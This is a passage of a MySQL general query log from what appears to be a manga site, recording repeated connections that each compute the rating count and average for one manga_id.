FROM ratings where manga_id = '41' order by created desc 330658256 Quit 330658257 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330658257 Quit 330658258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330658258 Quit 330658259 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330658259 Quit 330658260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330658260 Quit 330658261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330658261 Quit 330658262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330658262 Quit 330658263 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330658263 Quit 330658264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330658264 Quit 330658265 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330658265 Quit 330658266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330658266 Quit 330658267 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330658267 Quit 330658268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330658268 Quit 330658269 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330658269 Quit 330658270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330658270 Quit 330658271 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330658271 Quit 330658272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330658272 Quit 330658273 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330658273 Quit 330658274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330658274 Quit 330658275 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330658275 Quit 330658276 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330658276 Quit 330658277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330658277 Quit 330658278 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330658278 Quit 330658279 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330658279 Quit 330658280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330658280 Quit 330658281 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330658281 Quit 330658282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330658282 Quit 330658283 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330658283 Quit 330658284 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330658284 Quit 330658285 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330658285 Quit 330658286 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330658286 Quit 330658287 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330658287 Quit 330658288 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330658288 Quit 330658289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330658289 Quit 330658290 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330658290 Quit 330658291 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330658291 Quit 330658292 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330658292 Quit 330658293 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330658293 Quit 330658294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330658294 Quit 330658295 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658295 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330658295 Quit 330658296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330658296 Quit 330658297 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330658297 Quit 330658298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330658298 Quit 330658299 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658299 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330658299 Quit 330658300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330658300 Quit 330658301 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330658301 Quit 330658302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330658302 Quit 330658303 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658303 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330658303 Quit 330658304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330658304 Quit 330658305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330658305 Quit 330658306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658306 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330658306 Quit 330658307 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330658307 Quit 330658308 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330658308 Quit 330658309 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330658309 Quit 330658310 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330658310 Quit 330658311 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330658311 Quit 330658312 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330658312 Quit 330658313 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330658313 Quit 330658314 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330658314 Quit 330658315 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330658315 Quit 330658316 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658316 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330658316 Quit 330658317 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330658317 Quit 330658318 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658318 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330658318 Quit 330658319 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330658319 Quit 330658320 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658320 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330658320 Quit 330658321 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330658321 Quit 330658322 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658322 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330658322 Quit 330658323 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658323 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330658323 Quit 330658324 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658324 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330658324 Quit 330658325 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658325 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330658325 Quit 330658326 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658326 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330658326 Quit 330658327 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658327 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330658327 Quit 330658328 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658328 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330658328 Quit 330658329 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658329 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330658329 Quit 330658330 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658330 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330658330 Quit 330658331 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658331 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330658331 Quit 330658332 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658332 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330658332 Quit 330658333 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658333 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330658333 Quit 330658334 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658334 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330658334 Quit 330658335 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658335 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330658335 Quit 330658336 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658336 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330658336 Quit 330658337 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658337 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330658337 Quit 330658338 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658338 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330658338 Quit 330658339 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658339 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330658339 Quit 330658340 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658340 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330658340 Quit 330658341 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658341 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330658341 Quit 330658342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658342 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330658342 Quit 330658343 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658343 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330658343 Quit 330658344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658344 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330658344 Quit 330658345 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658345 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330658345 Quit 330658346 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658346 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330658346 Quit 330658347 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658347 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330658347 Quit 330658348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658348 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330658348 Quit 330658349 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658349 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330658349 Quit 330658350 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330658350 Quit 330658351 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658351 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330658351 Quit 330658352 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330658352 Quit 330658353 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658353 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330658353 Quit 330658354 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330658354 Quit 330658355 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658355 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330658355 Quit 330658356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330658356 Quit 330658357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658357 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330658357 Quit 330658358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330658358 Quit 330658359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658359 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330658359 Quit 330658360 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658360 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330658360 Quit 330658361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330658361 Quit 330658362 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330658362 Quit 330658363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330658363 Quit 330658364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330658364 Quit 330658365 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330658365 Quit 330658366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330658366 Quit 330658367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330658367 Quit 330658368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330658368 Quit 330658369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330658369 Quit 330658370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330658370 Quit 330658371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330658371 Quit 330658372 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330658372 Quit 330658373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330658373 Quit 330658374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330658374 Quit 330658375 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330658375 Quit 330658376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330658376 Quit 330658377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658377 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330658377 Quit 330658378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330658378 Quit 330658379 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330658379 Quit 330658380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330658380 Quit 330658381 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330658381 Quit 330658382 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330658382 Quit 330658383 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330658383 Quit 330658384 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330658384 Quit 330658385 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330658385 Quit 330658386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330658386 Quit 330658387 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658387 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330658387 Quit 330658388 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330658388 Quit 330658389 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330658389 Quit 330658390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658390 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330658390 Quit 330658391 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330658391 Quit 330658392 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330658392 Quit 330658393 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330658393 Quit 330658394 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330658394 Quit 330658395 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330658395 Quit 330658396 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330658396 Quit 330658397 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330658397 Quit 330658398 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330658398 Quit 330658399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330658399 Quit 330658400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658400 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330658400 Quit 330658401 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658401 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330658401 Quit 330658402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658402 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330658402 Quit 330658403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658403 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330658403 Quit 330658404 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658404 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330658404 Quit 330658405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658405 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330658405 Quit 330658406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658406 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330658406 Quit 330658407 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658407 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330658407 Quit 330658408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658408 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330658408 Quit 330658409 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658409 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM 